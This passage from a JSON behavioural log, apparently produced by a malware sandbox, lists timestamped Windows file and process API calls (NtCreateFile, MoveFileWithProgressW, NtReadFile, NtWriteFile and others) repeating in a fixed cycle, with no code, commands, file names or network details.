"2016-02-16 
17:41:47,651", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,651", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,661", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,671", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,671", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,681", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,681", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,681", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,691", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,691", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,691", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,691", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,691", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,691", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,701", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,711", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:47,711", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,721", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,721", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,721", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,721", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,721", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,721", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,731", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,731", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,731", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,741", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:47,741", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,741", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,741", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,741", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,741", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,751", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,751", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,761", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:47,761", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,761", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,761", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,761", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,761", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,761", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,771", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,771", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,781", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,781", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:47,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,781", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,781", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,781", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,781", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,791", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,801", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,811", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,811", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,821", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,831", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,841", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,851", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,851", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,861", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:47,871", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,871", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,871", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,881", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,881", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:47,891", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,901", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,911", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:47,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,921", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,921", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,931", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,941", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,941", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,941", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,941", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,941", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,941", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,951", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:47,961", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,971", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,971", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "NtSetInformationFile"}, 